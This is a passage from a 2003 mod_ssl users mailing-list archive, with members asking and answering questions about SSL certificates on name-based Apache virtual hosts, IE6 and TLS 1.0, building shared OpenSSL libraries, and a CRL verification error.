that's the way it goes.

Same question answer number four billion six hundred seventeen million 
two hundred thirty-four thousand nine hunderd twenty-four!

;)

JDB

toxshark wrote:

> i have the apache configured with 2 VirtualHosts on port 443.
>
> both VirtualServers have separately CertificateFiles and 
> CertificateKeyFiles.
>
> but now if i connect to the VirtualHost2, the Host have the 
> Certificate from the VirtualServer1!
>
> both Hosts have now the same Certificate.
>
>  
>
> my httpd.config:
>
>  
>
> ...
>
> NameVirtualHost 92.35.28.17:443
>
>  
>
> 
>
> ServerName domain1.com
>
> ServerAlias www.domain1.com
>
> DocumentRoot "/web1/"
>
> SSLEngine on
>
> SSLCertificateFile /usr/local/etc/apache/key/ssl1.cert
>
> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl1.key
>
> 
>
>  
>
> 
>
> ServerName domain2.com
>
> ServerAlias www.domain2.com
>
> DocumentRoot "/web2/"
>
> SSLEngine on
>
> SSLCertificateFile /usr/local/etc/apache/key/ssl2.cert
>
> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl2.key
>
> 
>
> ...
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  9 15:42:10 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C85D52AA09F; Thu,  9 Jan 2003 15:42:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.allinterior.com (h-64-105-192-198.MIATFLAD.covad.net [64.105.192.198])
	by master.modssl.org (Postfix) with ESMTP id D57E02AA082
	for ; Thu,  9 Jan 2003 15:42:08 +0100 (CET)
Received: from icarrion (h-64-105-192-205.MIATFLAD.covad.net [64.105.192.205])
	by mail.allinterior.com (Postfix) with ESMTP id C784A1DB265
	for ; Thu,  9 Jan 2003 09:27:28 -0500 (EST)
From: "Irving Carrion" 
To: 
Subject: RE: 2 VirtualHosts with 2 Certificates
Date: Thu, 9 Jan 2003 09:41:54 -0500
Organization: All Interior Supply
Message-ID: <014d01c2b7ed$4129dd30$820000c0@icarrion>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <3E1C984B.2020802@basicsllp.com>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Irving Carrion" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Everyone knows this question will not stop coming... is it possible to
return an error message to the user when restarting apache?  Only a
suggestion....  =)

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of James Barwick
Sent: Wednesday, January 08, 2003 4:30 PM
To: modssl-users@modssl.org
Subject: Re: 2 VirtualHosts with 2 Certificates

Should have read the MOST FREQUENTLY ASKED FREQUENTLY ASKED QUESTIONS!!!

Can't do that.  Learn a little more about SSL.  It's IP based, not name 
based.  So, you can only have
one certificate and one firtual host on 92.35.28.17:443.  Sorry...but 
that's the way it goes.

Same question answer number four billion six hundred seventeen million 
two hundred thirty-four thousand nine hunderd twenty-four!

;)

JDB

toxshark wrote:

> i have the apache configured with 2 VirtualHosts on port 443.
>
> both VirtualServers have separately CertificateFiles and 
> CertificateKeyFiles.
>
> but now if i connect to the VirtualHost2, the Host have the 
> Certificate from the VirtualServer1!
>
> both Hosts have now the same Certificate.
>
>  
>
> my httpd.config:
>
>  
>
> ...
>
> NameVirtualHost 92.35.28.17:443
>
>  
>
> 
>
> ServerName domain1.com
>
> ServerAlias www.domain1.com
>
> DocumentRoot "/web1/"
>
> SSLEngine on
>
> SSLCertificateFile /usr/local/etc/apache/key/ssl1.cert
>
> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl1.key
>
> 
>
>  
>
> 
>
> ServerName domain2.com
>
> ServerAlias www.domain2.com
>
> DocumentRoot "/web2/"
>
> SSLEngine on
>
> SSLCertificateFile /usr/local/etc/apache/key/ssl2.cert
>
> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl2.key
>
> 
>
> ...
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  9 16:14:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 449612AA09F; Thu,  9 Jan 2003 16:14:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 288FF2AA082
	for ; Thu,  9 Jan 2003 16:14:44 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h09FEfCT018033
	for ; Thu, 9 Jan 2003 16:14:41 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h09FEdbI008271
	for ; Thu, 9 Jan 2003 16:14:40 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: 2 VirtualHosts with 2 Certificates
Date: Thu, 9 Jan 2003 16:14:39 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F777@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: 2 VirtualHosts with 2 Certificates
Thread-Index: AcK37W0DSeObcsySQuqZlkmCENd7agAA0hJg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Irving Carrion [mailto:icarrion@allinterior.com]
>Sent: Donnerstag, 9. Januar 2003 15:42
>To: modssl-users@modssl.org
>Subject: RE: 2 VirtualHosts with 2 Certificates
>
>
>Everyone knows this question will not stop coming... is it possible to
>return an error message to the user when restarting apache?  

The trouble is that it is not really an error.

- mod_ssl asks apache for the certificate pertaining to the virtual host
defined by the request's TCP/IP attributes (IP and port).
- Apache uses its standard ruleset (namely: if you have several VHs on
the same IP/port, use the first one) to get the cert.
- mod_ssl receives the cert and happily does the SSL negotiation.

There is nothing illegal in a config which attempts NBVH with SSL VHs so
it is difficult to spot the "error". 

>Only a
>suggestion....  =)
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org] On Behalf Of James Barwick
>Sent: Wednesday, January 08, 2003 4:30 PM
>To: modssl-users@modssl.org
>Subject: Re: 2 VirtualHosts with 2 Certificates
>
>Should have read the MOST FREQUENTLY ASKED FREQUENTLY ASKED 
>QUESTIONS!!!
>
>Can't do that.  Learn a little more about SSL.  It's IP based, 
>not name 
>based.  So, you can only have
>one certificate and one firtual host on 92.35.28.17:443.  Sorry...but 
>that's the way it goes.
>
>Same question answer number four billion six hundred seventeen million 
>two hundred thirty-four thousand nine hunderd twenty-four!
>
>;)
>
>JDB
>
>toxshark wrote:
>
>> i have the apache configured with 2 VirtualHosts on port 443.
>>
>> both VirtualServers have separately CertificateFiles and 
>> CertificateKeyFiles.
>>
>> but now if i connect to the VirtualHost2, the Host have the 
>> Certificate from the VirtualServer1!
>>
>> both Hosts have now the same Certificate.
>>
>>  
>>
>> my httpd.config:
>>
>>  
>>
>> ...
>>
>> NameVirtualHost 92.35.28.17:443
>>
>>  
>>
>> 
>>
>> ServerName domain1.com
>>
>> ServerAlias www.domain1.com
>>
>> DocumentRoot "/web1/"
>>
>> SSLEngine on
>>
>> SSLCertificateFile /usr/local/etc/apache/key/ssl1.cert
>>
>> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl1.key
>>
>> 
>>
>>  
>>
>> 
>>
>> ServerName domain2.com
>>
>> ServerAlias www.domain2.com
>>
>> DocumentRoot "/web2/"
>>
>> SSLEngine on
>>
>> SSLCertificateFile /usr/local/etc/apache/key/ssl2.cert
>>
>> SSLCertificateKeyFile /usr/local/etc/apache/key/ssl2.key
>>
>> 
>>
>> ...
>>
>>  
>>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  9 18:19:14 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 078162AA09F; Thu,  9 Jan 2003 18:19:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from c000.snv.cp.net (h000.c000.snv.cp.net [209.228.32.64])
	by master.modssl.org (Postfix) with SMTP id 0E5652AA082
	for ; Thu,  9 Jan 2003 18:19:12 +0100 (CET)
Received: (cpmta 10102 invoked from network); 9 Jan 2003 09:19:07 -0800
Received: from 80.192.228.92 (HELO jordan.pollard.net)
  by smtp.pollard.net (209.228.32.64) with SMTP; 9 Jan 2003 09:19:07 -0800
X-Sent: 9 Jan 2003 17:19:07 GMT
Message-Id: <5.1.0.14.0.20030109171415.01c3be00@getmail.pollard.net>
X-Sender: john@getmail.pollard.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Thu, 09 Jan 2003 17:18:43 +0000
To: modssl-users@modssl.org
From: John Pollard 
Subject: Use TLS 1.0 needed in Internet Explorer
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Pollard 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have set up my web site (www.meierpollard.co.uk) with an InstantSSL 
security certificate referenced in httpd.conf. When using Netscape 
Navigator it can be viewed through a secure connection without complaint 
and the certificate chain can be viewed.

When using IE (6) however the certificate authority can not be verified and 
when I view the details I can see the chain has not been resolved. However, 
by selecting Use TLS 1.0 in the Advanced preferences I can get it to work.

Why would my web site be demanding use of TLS when by default IE doesn't 
use it?

Thanks,
John

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 10 00:40:55 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 19DE42AA0B0; Fri, 10 Jan 2003 00:40:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 3DD722AA083
	for ; Fri, 10 Jan 2003 00:40:53 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h09NeI7B028181;
	Thu, 9 Jan 2003 18:40:18 -0500
Date: Thu, 9 Jan 2003 18:40:18 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Tai Do , 
Subject: Re: building shared libraries with OpenSSL
In-Reply-To: <000901c2b834$7f3d9e30$49010a0a@tdo>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 9 Jan 2003, Tai Do wrote:

> I'm trying to get Apache2 working on Solaris 8.  I have the following error
> and saw that your answer on the mailing list work.  I was wondering if you
> can help me out with it because I'm not too sure what to do.
>
> Syntax error on line 234 of /usr/local/apache2/conf/httpd.conf:
>
> Cannot load /usr/local/apache2/modules/mod_ssl.so into server: ld.so.1:
> /usr/local/apache2/bin/httpd: fatal: relocation error: file
> /usr/local/apache2/modules/mod_ssl.so: symbol X509_INFO_free: referenced
> symbol not found.
>
> Here is the answer you posted:
>
>> Yes, it's a fairly frequently asked question.  The problem is that
>> you've built a shared mod_ssl against a static OpenSSL (ie, libssl.a
>> and libcrypto.a instead of .so).  That won't work because the way the
>> build system currently works, OpenSSL is linked into httpd, not
>> mod_ssl.  httpd doesn't need the symbols from the OpenSSL libraries, so
>> the static linker throws them away, meaning they're no longer available
>> when mod_ssl is dynamically linked at runtime.
>>
>> Solution: use a shared OpenSSL.
>
> I was wondering how I use a shared OpenSSL.  I was wondering if you can
> point me to where I can find steps to do this or show me how.


I'm CC:'ing this to the modssl-users list, since I'm sure somebody else
out there probably has the same question.

It's kind of annoying, because the shared library support in OpenSSL is
"experimental", which in practice just means that the Makefile is
non-intuitive.  I just ran through it again to make sure I got all the
steps right... here's what you do.

I'm going to assume that you have the static version of OpenSSL installed
in /usr/local/lib in this example... just fix the path to match where
OpenSSL gets installed on your machine.

So let's say you've installed OpenSSL previously, but it's the static
version, so you have /usr/local/lib/libssl.a and
/usr/local/lib/libcrypto.a .  Remove those.

Go back to the OpenSSL source directory and do the following:

./config
make
make build-shared
mv libssl.so* /usr/local/lib
mv libcrypto.so* /usr/local/lib
ldconfig

(note: do NOT run make install, or it will remove all your shared
libraries and install the static ones, and you'll have to start over
again.  :-)

That ought to do it.  I recommend doing a search on your filesystem for
other, older copies of libssl* and libcrypto* that might be hanging
around, as sometimes copies get put in strange places and you want to be
sure to only have one: the most recent.

Hope that helps...

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 10 12:32:30 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C995C2AA0B4; Fri, 10 Jan 2003 12:32:30 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mel-rto2.wanadoo.fr (smtp-out-2.wanadoo.fr [193.252.19.254])
	by master.modssl.org (Postfix) with ESMTP id AF62D2AA09A
	for ; Fri, 10 Jan 2003 12:32:29 +0100 (CET)
Received: from mel-rta9.wanadoo.fr (193.252.19.69) by mel-rto2.wanadoo.fr (6.7.015)
        id 3E0C3370007B1C84 for modssl-users@modssl.org; Fri, 10 Jan 2003 12:32:28 +0100
Received: from OTANTAOUI (217.128.188.192) by mel-rta9.wanadoo.fr (6.7.015)
        id 3E075B46007DFEE0 for modssl-users@modssl.org; Fri, 10 Jan 2003 12:32:28 +0100
From: "Omar TANTAOUI" 
To: 
Subject: CRL verification failed on apache-mod_ssl 2.0.40
Date: Fri, 10 Jan 2003 12:32:29 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0003_01C2B8A4.5706B580"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MS-TNEF-Correlator: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar TANTAOUI" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0003_01C2B8A4.5706B580
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi everybody

I am using Apache 2.0.40 with mod_ssl 2.0.40-11 on a Linux Redhat 8.0.
I have configured apache in order to have a secured area where clients must
authenticate themselves with certificates. Until this point everything works
fine.

But when I added the crl verification feature, I got the followin errror
message:

[Fri Jan 10 12:21:09 2003] [error] Re-negotiation handshake failed: Not
accepted by client!?
[Fri Jan 10 12:21:09 2003] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]
[Fri Jan 10 12:21:11 2003] [warn] Invalid signature on CRL
[Fri Jan 10 12:21:11 2003] [error] Certificate Verification: Error (8): CRL
signature failure
[Fri Jan 10 12:21:11 2003] [error] Re-negotiation handshake failed: Not
accepted by client!?
[Fri Jan 10 12:21:11 2003] [error] SSL handshake failed (server
192.168.2.237:443, client 192.168.2.178)
[Fri Jan 10 12:21:11 2003] [error] SSL Library Error: 336130161
error:1408F071:lib(20):func(143):reason(113) 

Apache says that crl signature is wrong but when I verify it using the
openssl command line, the result is OK !?

Has anybody experienced this problem ? Any idea on how to fix it?

Thanks a lot.


------=_NextPart_000_0003_01C2B8A4.5706B580
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="winmail.dat"

eJ8+Ih0LAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEGgAMADgAAANMHAQAKAAwAIAAAAAUAFgEB
A5AGADAIAAAmAAAACwACAAEAAAALACMAAAAAAAMAJgAAAAAACwApAAAAAAADADYAAAAAAB4AcAAB
AAAAMQAAAENSTCB2ZXJpZmljYXRpb24gZmFpbGVkIG9uIGFwYWNoZS1tb2Rfc3NsIDIuMC40MAAA
AAACAXEAAQAAABYAAAABwrib9Ol9jhoM8aROQLaWeGtFxYWTAAACAR0MAQAAAB0AAABTTVRQOk9N
QVIuVEFOVEFPVUlAQVRFWE8uQ09NAAAAAAsAAQ4AAAAAQAAGDgA4vOObuMIBAgEKDgEAAAAYAAAA
AAAAADQcnhKOOKhDhyno/hgZ/TTCgAAACwAfDgEAAAACAQkQAQAAAJIDAACOAwAAjQUAAExaRnUE
c/wdAwAKAHJjcGcxMjUWMgD4C2BuDhAwMzZPAfcCpAPjAgBjaArAc7BldDAgBxMCgH0KgZJ2CJB3
awuAZDQMYA5jAFALAwu1IEhpIJRldgSQeQbgZHkKogMKhAqASSBhbSB1HwCQDyARYAqwEOBlIDIw
LjAuNBFQA/B0aDogBGFfBBADIBZ0LTFMMSACIBVgIEwLgHXeeAfwCYAQ8AVAOBaBFPYLEPAUECAF
oG5maWf/CHAJgBVgFhQLgBhACyAEkLggdG8aJBiAESBjGuS7CXAYgHcWQAlwGnBsCJCbAjAEIG0V
oAVAYXUXAF8eMQ3gGUAWUB7xbREgbPcUEAQgFuNjBJAfMBqwH1Lwcy4gVR8hAyAXAAQA+CBwbwuA
BUAUAyHhFdGadwWwawQgGrBuZRmlvRSUQh7gHZIDoBVRZAEAdxsQHvEacHIDIBQRIORpVRhRZh1w
dBrhLCUxZ+5vBUAlwgIQbAkAA/ADoA8EkCjgBbEHgXNhZ2WSOhSaW0YFECBKA5EDD0ArADI6MjE6
MIo5FmAwD1BdIFso0fcFsCwQGQAtI8AnwQcwJsNrEPASgHMQ8GsoIQtwbP0JgDoHsCfRANAgoAUw
GwHkYnkd9SE/Ki8rPyxFnFNwCHEIYAZBU0wtmesiUSjRdQUxWxPQAjAuoKhVc3UHQGwvoGoeklMC
IBZQb2YfkW8RICB8T3AJ8DNiGoIVoQIgc70wIF0wTzFVGCEr1XcKwKJuLBBJbnYHQGkbEBkAkGdu
JzMYQkNSTJc4TzlfLEVDILggViZZxS6gRSjzKDgpLqA8Ef87OS5CGuE8Tz1fLE8tXy5v/y9/Qr9D
zzKiM3tGlEDAESCWchQRMSA5FnAxNhlwARZwMjM3OjQ0M+cngB4ETOkxN0DgSJ9Jr/NKuRigYnIK
wEfwQHNG8OIzD2AxMzBNMBgwRJPDObAWsDhGMDcxoB4QHGIoAdBA8DegbmMo7VQwM0DwHWFzAiBV
gFNg3ikK4xTWFgUpcHkEIBcAbxlBJgI7SCIBdwNgFdFivyTIJkNH8BbwFZUlwm83AfsXcgWgbQOB
GxAeECPAJ4A3JcIJcDVgbAVAIgFPS7YgSHYUlEhWABVgbhRD/RPweDcACIFVYCWTIgIDYPMCYB/A
ID8RYF9wG5ABAP8YgEXCKIAcIhqwGOAW8F5b3lRF8SNxGIAJAHQj6xHhAgBlwAAAAwABbiAAAAAL
AAGACCAGAAAAAADAAAAAAAAARgAAAAADhQAAAAAAAAMAA4AIIAYAAAAAAMAAAAAAAABGAAAAABCF
AAAAAAAAAwAHgAggBgAAAAAAwAAAAAAAAEYAAAAAUoUAAI5qAQAeAAiACCAGAAAAAADAAAAAAAAA
RgAAAABUhQAAAQAAAAQAAAA5LjAAHgAJgAggBgAAAAAAwAAAAAAAAEYAAAAANoUAAAEAAAABAAAA
AAAAAB4ACoAIIAYAAAAAAMAAAAAAAABGAAAAADeFAAABAAAAAQAAAAAAAAAeAAuACCAGAAAAAADA
AAAAAAAARgAAAAA4hQAAAQAAAAEAAAAAAAAACwANgAggBgAAAAAAwAAAAAAAAEYAAAAAgoUAAAEA
AAALADqACCAGAAAAAADAAAAAAAAARgAAAAAOhQAAAAAAAAMAPIAIIAYAAAAAAMAAAAAAAABGAAAA
ABGFAAAAAAAAAwA9gAggBgAAAAAAwAAAAAAAAEYAAAAAGIUAAAAAAAALAFKACCAGAAAAAADAAAAA
AAAARgAAAAAGhQAAAAAAAAMAU4AIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAAAAAAAgH4DwEAAAAQ
AAAANByeEo44qEOHKej+GBn9NAIB+g8BAAAAEAAAADQcnhKOOKhDhyno/hgZ/TQCAfsPAQAAAJ4A
AAAAAAAAOKG7EAXlEBqhuwgAKypWwgAAUFNUUFJYLkRMTAAAAAAAAAAATklUQfm/uAEAqgA32W4A
AABDOlxEb2N1bWVudHMgYW5kIFNldHRpbmdzXE9tciBUQU5UQU9VSVxMb2NhbCBTZXR0aW5nc1xB
cHBsaWNhdGlvbiBEYXRhXE1pY3Jvc29mdFxPdXRsb29rXG91dGxvb2sucHN0AAAAAwD+DwUAAAAD
AA00/TcAAAIBfwABAAAANwAAADxLSUVESUhDSk5NT0NJR0FMSERBTUlFTEFDQUFBLm9tYXIudGFu
dGFvdWlAYXRleG8uY29tPgAAAwAGEIgrWOUDAAcQwgMAAAMAEBAAAAAAAwAREAEAAAAeAAgQAQAA
AGUAAABISUVWRVJZQk9EWUlBTVVTSU5HQVBBQ0hFMjA0MFdJVEhNT0RTU0wyMDQwLTExT05BTElO
VVhSRURIQVQ4MElIQVZFQ09ORklHVVJFREFQQUNIRUlOT1JERVJUT0hBVkVBU0VDAAAAAP3s

------=_NextPart_000_0003_01C2B8A4.5706B580--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 12 12:41:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DAFBF2AA0B4; Sun, 12 Jan 2003 12:41:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from yin (onicrom.com [216.127.92.9])
	by master.modssl.org (Postfix) with ESMTP id 07E0D2AA085
	for ; Sun, 12 Jan 2003 12:41:26 +0100 (CET)
Received: by yin (Postfix, from userid 1000)
	id 1C42420002; Sun, 12 Jan 2003 06:41:23 -0500 (EST)
Received: from localhost (localhost [127.0.0.1])
	by yin (Postfix) with ESMTP id 191E31FFFE
	for ; Sun, 12 Jan 2003 06:41:23 -0500 (EST)
Date: Sun, 12 Jan 2003 06:41:23 -0500 (EST)
From: Kyle O'Donnell 
To: modssl-users@modssl.org
Subject: sorry all, test
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kyle O'Donnell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

test
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 12 22:36:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3720A2AA0B4; Sun, 12 Jan 2003 22:36:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta201-rme.xtra.co.nz (mta201-rme.xtra.co.nz [210.86.15.144])
	by master.modssl.org (Postfix) with ESMTP id 8131B2AA099
	for ; Sun, 12 Jan 2003 22:36:45 +0100 (CET)
Received: from mta5-rme.xtra.co.nz ([210.86.15.141])
          by mta201-rme.xtra.co.nz with ESMTP
          id <20030112213639.DOTU1191.mta201-rme.xtra.co.nz@mta5-rme.xtra.co.nz>
          for ; Mon, 13 Jan 2003 10:36:39 +1300
Received: from xtra.co.nz ([210.86.54.166]) by mta5-rme.xtra.co.nz
          with ESMTP
          id <20030112213638.JFAD18554.mta5-rme.xtra.co.nz@xtra.co.nz>
          for ; Mon, 13 Jan 2003 10:36:38 +1300
Message-ID: <3E21DFE6.6050001@xtra.co.nz>
Date: Mon, 13 Jan 2003 10:36:38 +1300
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1) Gecko/20021207
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
References: <014d01c2b7ed$4129dd30$820000c0@icarrion>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Irving Carrion wrote:
> Everyone knows this question will not stop coming... is it possible to
> return an error message to the user when restarting apache?  Only a
> suggestion....  =)
Please DON'T do this.

Confession time. I actually have a use for NBVHs with SSL, and I'd 
prefer not to have it broken gratuitously.

I run a site whose members collaborate using a number of Web-based 
tools.  All members are issued with client certificates signed by our 
private CA, and I have a single instance of Apache+mod-ssl with a single 
IP address acting as an SSL-only reverse-proxy for these tools.

Some parts of the site have varying authorisation policy rules, and some 
of the proxied tools assume that they own the root of the site and can't 
cope with explicit ports in URLs.  For these reasons, it is convenient 
to split the site into multiple NBVHs.

These NBVHs are all derived off the same 3rd-level domain, and thus we 
can use the same wildcard certificate for each NBVH (users whose 
browsers don't recognise wildcard certificates need only placate the 
browser once in most cases).

This set-up has been working for over two years now, but I do 
occasionally have wakeful nights wondering if someone will break this 
counter-documented capability.

I realise I am on thin ice as it would be a "reasonable" optimisation to 
assign the final virtual host at an earlier stage than is currently the 
case with SSL.

Am I on my own here?
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of James Barwick
> Sent: Wednesday, January 08, 2003 4:30 PM
> To: modssl-users@modssl.org
> Subject: Re: 2 VirtualHosts with 2 Certificates
> 
> Should have read the MOST FREQUENTLY ASKED FREQUENTLY ASKED QUESTIONS!!!
> 
> Can't do that.  Learn a little more about SSL.  It's IP based, not name 
> based.  So, you can only have
> one certificate and one firtual host on 92.35.28.17:443.  Sorry...but 
> that's the way it goes.
> 
> Same question answer number four billion six hundred seventeen million 
> two hundred thirty-four thousand nine hunderd twenty-four!
> 
> ;)
> 
> JDB
> 
> toxshark wrote:
> 
> 
>>i have the apache configured with 2 VirtualHosts on port 443.
>>
>>both VirtualServers have separately CertificateFiles and 
>>CertificateKeyFiles.
>>
>>but now if i connect to the VirtualHost2, the Host have the 
>>Certificate from the VirtualServer1!
>>
>>both Hosts have now the same Certificate.
>>
>> 
>>
>>my httpd.config:
>>
>> 
>>
>>...
>>
>>NameVirtualHost 92.35.28.17:443
>>
>> 
>>
>>
>>
>>ServerName domain1.com
>>
>>ServerAlias www.domain1.com
>>
>>DocumentRoot "/web1/"
>>
>>SSLEngine on
>>
>>SSLCertificateFile /usr/local/etc/apache/key/ssl1.cert
>>
>>SSLCertificateKeyFile /usr/local/etc/apache/key/ssl1.key
>>
>>
>>
>> 
>>
>>
>>
>>ServerName domain2.com
>>
>>ServerAlias www.domain2.com
>>
